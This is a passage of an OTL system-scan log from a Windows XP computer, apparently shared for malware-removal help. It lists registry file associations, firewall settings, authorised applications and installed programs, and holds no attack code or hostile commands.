HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --hide-icons [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --show-icons [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2014/08/06 21:20:57 | 000,860,488 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\system32\ie4uinit.exe" -reinstall [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -hide [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -show [2014/02/25 16:38:29 | 000,070,656 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2014/02/25 16:34:44 | 000,643,312 | ---- | M] (Microsoft Corporation)

< End of report >

 

EXTRAS Log:

 

OTL Extras logfile created on: 8/29/2014 9:09:26 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Documents and Settings\Jay\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
1014.42 Mb Total Physical Memory | 264.36 Mb Available Physical Memory | 26.06% Memory free
2.38 Gb Paging File | 1.77 Gb Available in Paging File | 74.30% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 71.84 Gb Total Space | 31.10 Gb Free Space | 43.29% Space Free | Partition Type: NTFS
Drive D: | 72.31 Gb Total Space | 13.53 Gb Free Space | 18.71% Space Free | Partition Type: FAT32
 
Computer Name: MOLES | User Name: Jay | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.html [@ = ChromeHTML] -- C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.)
.url [@ = InternetShortcut] -- rundll32.exe ieframe.dll,OpenURL %l
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
InternetShortcut [open] -- rundll32.exe ieframe.dll,OpenURL %l
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Digital Photo Professional] -- C:\Program Files\Canon\Digital Photo Professional\DPP\DPPViewer.exe /path "%1" (CANON INC.)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled" = 1
"UPDATESDISABLENOTIFY" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]
 
========== System Restore Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
"Start" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
"Start" = 2
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0
"DisableNotifications" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"427:TCP" = 427:TCP:LocalSubNet:Enabled:SLP_Port(427)_TCP
"427:UDP" = 427:UDP:LocalSubNet:Enabled:SLP_Port(427)_UDP
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
"DisableNotifications" = 1
"DoNotAllowExceptions" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"1901:UDP" = 1901:UDP:*:Enabled:Windows Media Format SDK (firefox.exe)
"427:TCP" = 427:TCP:LocalSubNet:Enabled:SLP_Port(427)_TCP
"427:UDP" = 427:UDP:LocalSubNet:Enabled:SLP_Port(427)_UDP
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%windir%\system32\sessmgr.exe" = %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019 -- (Microsoft Corporation)
"%windir%\Network Diagnostic\xpnetdiag.exe" = %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000 -- (Microsoft Corporation)
"C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe:*:Enabled:hpqtra08.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe:*:Enabled:hpqste08.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe" = C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Enabled:hposid01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe:*:Enabled:hpqkygrp.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpfcCopy.exe" = C:\Program Files\HP\Digital Imaging\bin\hpfcCopy.exe:*:Enabled:hpfccopy.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe" = C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe:*:Enabled:hpoews01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe" = C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe:*:Enabled:hpiscnapp.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe:*:Enabled:hpqgplgtupl.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe:*:Enabled:hpqgpc01.exe -- (Hewlett-Packard)
"C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe:*:Enabled:hpqusgm.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe:*:Enabled:hpqusgh.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\HP Software Update\hpwucli.exe" = C:\Program Files\HP\HP Software Update\hpwucli.exe:*:Enabled:hpwucli.exe -- (Hewlett-Packard)
"C:\Program Files\HP\Digital Imaging\smart web printing\SmartWebPrintExe.exe" = C:\Program Files\HP\Digital Imaging\smart web printing\SmartWebPrintExe.exe:*:Enabled:smartwebprintexe.exe -- (Hewlett-Packard Co.)
"E:\setup\hpznui01.exe" = E:\setup\hpznui01.exe:*:Enabled:hpznui01.exe
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\system32\sessmgr.exe" = %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019 -- (Microsoft Corporation)
"%windir%\Network Diagnostic\xpnetdiag.exe" = %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000 -- (Microsoft Corporation)
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE" = C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook -- (Microsoft Corporation)
"C:\Program Files\Starcraft\StarCraft.exe" = C:\Program Files\Starcraft\StarCraft.exe:*:Enabled:Starcraft -- (Blizzard Entertainment)
"C:\Program Files\iTunes\iTunes.exe" = C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes -- (Apple Inc.)
"C:\Program Files\Mozilla Firefox\firefox.exe" = C:\Program Files\Mozilla Firefox\firefox.exe:*:Enabled:Firefox -- (Mozilla Corporation)
"C:\Program Files\Spybot - Search & Destroy\SDUpdate.exe" = C:\Program Files\Spybot - Search & Destroy\SDUpdate.exe:*:Enabled:Updater for Spybot-S&D
"C:\Program Files\Common Files\Java\Java Update\jusched.exe" = C:\Program Files\Common Files\Java\Java Update\jusched.exe:*:Disabled:Java™ Update Scheduler -- (Oracle Corporation)
"C:\Program Files\Common Files\Java\Java Update\jucheck.exe" = C:\Program Files\Common Files\Java\Java Update\jucheck.exe:*:Disabled:Java™ Update Checker -- (Oracle Corporation)
"C:\Program Files\Mozilla Firefox\plugin-container.exe" = C:\Program Files\Mozilla Firefox\plugin-container.exe:*:Enabled:Plugin Container for Firefox -- (Mozilla Corporation)
"C:\Documents and Settings\Jay\My Documents\Downloads\SUPERAntiSpyware.exe" = C:\Documents and Settings\Jay\My Documents\Downloads\SUPERAntiSpyware.exe:*:Enabled:SUPERAntiSpyware Free Edition Setup -- (SUPERAntiSpyware.com)
"C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe" = C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe:*:Enabled:SUPERAntiSpyware Application -- ()
"C:\Program Files\Pandora\Pandora.exe" = C:\Program Files\Pandora\Pandora.exe:*:Enabled:Pandora -- ()
"C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe:*:Enabled:hpqtra08.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe:*:Enabled:hpqste08.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe" = C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Enabled:hposid01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe:*:Enabled:hpqkygrp.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpfcCopy.exe" = C:\Program Files\HP\Digital Imaging\bin\hpfcCopy.exe:*:Enabled:hpfccopy.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe" = C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe:*:Enabled:hpoews01.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe" = C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe:*:Enabled:hpiscnapp.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe:*:Enabled:hpqgplgtupl.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe:*:Enabled:hpqgpc01.exe -- (Hewlett-Packard)
"C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe:*:Enabled:hpqusgm.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe" = C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe:*:Enabled:hpqusgh.exe -- (Hewlett-Packard Co.)
"C:\Program Files\HP\HP Software Update\hpwucli.exe" = C:\Program Files\HP\HP Software Update\hpwucli.exe:*:Enabled:hpwucli.exe -- (Hewlett-Packard)
"C:\Program Files\HP\Digital Imaging\smart web printing\SmartWebPrintExe.exe" = C:\Program Files\HP\Digital Imaging\smart web printing\SmartWebPrintExe.exe:*:Enabled:smartwebprintexe.exe -- (Hewlett-Packard Co.)
"C:\Program Files\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe" = C:\Program Files\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe:*:Enabled:WebKit -- (Apple Inc.)
"C:\Program Files\Bonjour\mDNSResponder.exe" = C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour Service -- (Apple Inc.)
"C:\Program Files\Google\Chrome\Application\chrome.exe" = C:\Program Files\Google\Chrome\Application\chrome.exe:*:Enabled:Google Chrome -- (Google Inc.)
 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0367BC04-ADEA-47A5-9F82-96C161C99B52}" = When Bugs Attack
"{05BDC796-3451-4F81-B91D-E98F7ADA76C2}" = TurboTax 2010 WinPerTaxSupport
"{06A1D88C-E102-4527-AF70-29FFD7AF215A}" = Scan
"{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}" = Windows Live ID Sign-in Assistant
"{08C5815C-2C6E-44f8-8748-0E61BC9AFB68}" = Symantec KB-DocID:2003093015493306
"{097CDB1E-07C9-40F1-9972-F0F9F3A287E4}" = Network
"{0A3925EA-5B0E-401B-A189-7419149747B2}" = Adobe AIR
"{0CB98AC0-D691-4B21-AD3D-95982517021D}" = Acer WLAN 11g USB Dongle
"{0F6F6876-6334-4977-B5DD-CFC12E193420}" = iTunes
"{1458BB78-1DC5-4BC0-B9A3-2B644F5A8105}" = DeviceDiscovery
"{150B6201-E9E6-4DFB-960E-CCBD53FBDDED}" = HPProductAssistant
"{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{26A24AE4-039D-4CA4-87B4-2F83217025FF}" = Java 7 Update 25
"{292F0F52-B62D-4E71-921B-89A682402201}" = Toolbox
"{2AB5A6A3-71C3-49EE-A253-759E01512FF8}" = Journey to Stonehenge
"{2F7D5734-056F-4A0A-A1C7-CA1AAE5BB1EB}" = Angry Birds
"{3323D8AC-5821-4A8F-8064-46DE657834CE}" = Frog Frenzy 2
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{3782EC09-4000-475E-8A59-9CABD6F03B4C}" = TurboTax 2010 WinPerFedFormset
"{385979FE-DC4F-4140-8EAD-A59625000D72}" = NTI Backup NOW! 4
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{407B9B5C-DAC5-4F44-A756-B57CAB4E6A8B}" = Google Earth
"{42BBA4CC-EFB6-4653-A2CC-F305D4B399C3}" = PS_AIO_07_D110_SW_Min
"{43602F34-1AA3-44FB-AEB2-D08C2C73743F}" = Paint.NET v3.36
"{4998FF95-709A-430A-B104-92A009ABB848}" = QuickConnect
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4AD13F68-CADA-4C6B-9759-C33753F89908}" = Acer eDataSecurity Management
"{4F2FCCCF-29F3-44B9-886F-6D16F8417522}" = TurboTax 2010 wrapper
"{565E7B0E-B76B-4EAD-9753-F1E72A5CF12E}" = HPAppStudio
"{5B025634-7D5B-4B8D-BE2A-7943C1CF2D5D}" = Status
"{5F189DF5-2D05-472B-9091-84D9848AE48B}{19275d4b}" = Browser System Enahncer
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{6142632E-6119-4117-AF54-A5366ACEC899}" = TurboTax 2011 wutiper
"{652C4ADF-0A29-4B02-9211-EE61675847DE}" = Canon Camera WIA Driver
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6D10C4BE-0C36-4F4E-8C3A-E5E867A5F01D}" = QuickConnect
"{74BE7519-41A7-45A8-8AA6-78C7907A4808}" = EOS Capture 1.2
"{750CF8D7-4B04-404F-AFA2-14C129C42373}" = EOS Viewer Utility 1.2.1
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7DECB2A6-C226-6042-9C2B-83316950D30E}" = Pandora
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8BBF6DFD-0AD9-43A7-9FBD-BF065E3866AF}" = URGE
"{8EE94FD8-5F52-4463-A340-185D16328158}" = WebReg
"{8FF6F5CA-4E30-4E3B-B951-204CAAA2716A}" = SmartWebPrinting
"{90120000-0010-0409-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders  (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_PROHYBRIDR_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_PROHYBRIDR_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_PROHYBRIDR_{2314F9A1-126F-45CC-8A5E-DFAF866F3FBC}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_PROHYBRIDR_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_PROHYBRIDR_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_PROHYBRIDR_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{91120000-0031-0000-0000-0000000FF1CE}" = Microsoft Office Professional Hybrid 2007
"{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{91201F55-A6E6-494C-A930-CAFD3C3CD342}" = TouchCopy
"{91D3AD6F-09CD-4695-9FA3-8FB15429BE97}" = D110
"{9692FD03-6662-4E62-B08C-30DFF51651E1}" = Actiontec Gateway
"{97486FBE-A3FC-4783-8D55-EA37E9D171CC}" = HP Update
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A202BDBA-753F-41B9-B649-CFB0B45FC03E}" = Star Wars Galactic Battlegrounds
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{A525E00B-6609-442E-9DCD-64453C233E8D}" = TurboTax 2010 WinPerReleaseEngine
"{A63E18AC-B504-4045-AFE6-A279BBABB988}" = Qwest QuickAssist Desktop Tools
"{A80FA752-C491-4ED9-ABF0-4278563160B2}" = 32 Bit HP CIO Components Installer
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.08)
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{B2544A03-10D0-4E5E-BA69-0362FFC20D18}" = OGA Notifier 2.0.0048.0
"{BB3447F6-9553-4AA9-960E-0DB5310C5779}" = GPBaseService2
"{BC5DD87B-0143-4D14-AAE6-97109614DC6B}" = SolutionCenter
"{BCE72AED-3332-4863-9567-C5DCB9052CA2}" = Netflix Movie Viewer
"{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}" = Destinations
"{BFCA7375-81A2-44F8-BFC1-0DC5A3D23405}" = TurboTax 2010 wutiper
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C537C86E-22C0-41CF-8A8E-3B23E986C3D9}" = Canon Camera WIA Driver
"{CAF5B770-082F-40C4-853D-3973BB81BDAA}" = TurboTax 2011 WinPerTaxSupport
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CD31E63D-47FD-491C-8117-CF201D0AFAB5}" = TrayApp
"{CD95F661-A5C4-44F5-A6AA-ECDD91C240B8}" = WinZip 12.1
"{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}" = SUPERAntiSpyware
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D360FA88-17C8-4F14-B67F-13AAF9607B12}" = MarketResearch
"{D4DDFAA1-EC37-4529-AD5B-A433ADE68662}" = Apple Mobile Device Support
"{D6C3C9E7-D334-4918-BD57-5B1EF14C207D}" = Bing Bar
"{D755C7A3-C03E-4460-8C00-AC6E55505FB5}" = LightScribe  1.4.74.1
"{DBC1DE57-B55A-4D57-9769-1DB9BE506AF7}" = HP Photosmart D110 All-In-One Driver Software 14.0 Rel. 7
"{DBEA1034-5882-4A88-8033-81C4EF0CFA29}" = Google Toolbar for Internet Explorer
"{E463E171-4082-4744-A466-F7CBE8502789}" = TurboTax 2011 WinPerReleaseEngine
"{E517094C-06B6-419F-8FFD-EF4F57972130}" = QuickTransfer
"{ED9775A0-383E-4EAA-8DA5-8CC6860D60A3}" = Canon Camera WIA Driver
"{EE556A3E-EB37-4392-9637-BAA8EC2F47FA}" = TurboTax 2011 wrapper
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F5266D28-E0B2-4130-BFC5-EE155AD514DC}" = Apple Application Support
"{FA0FF682-CC70-4C57-93CD-E276F3E7537E}" = BufferChm
"{FAD3D68B-2F9C-459B-AA79-C04B9090FD72}" = TurboTax 2011 WinPerFedFormset
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 14 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 14 Plugin
"Adobe Photoshop Elements 2.0" = Adobe Photoshop Elements 2.0
"Amazon Games & Software Downloader_is1" = Amazon Games & Software Downloader
"avast" = avast! Internet Security
"CANON iMAGE GATEWAY Task" = CANON iMAGE GATEWAY Task for ZoomBrowser EX
"Canon Internet Library for ZoomBrowser EX" = Canon Internet Library for ZoomBrowser EX
"Canon MOV Decoder" = Canon MOV Decoder
"Canon MOV Encoder" = Canon MOV Encoder
"Cisco Connect" = Cisco Connect
"com.pandora.desktop.E7C14276FFE9EEF0BC7DCE654C467D9A299EFD21.1" = Pandora
"DPP" = Canon Utilities Digital Photo Professional 3.8
"EOS Utility" = Canon Utilities EOS Utility
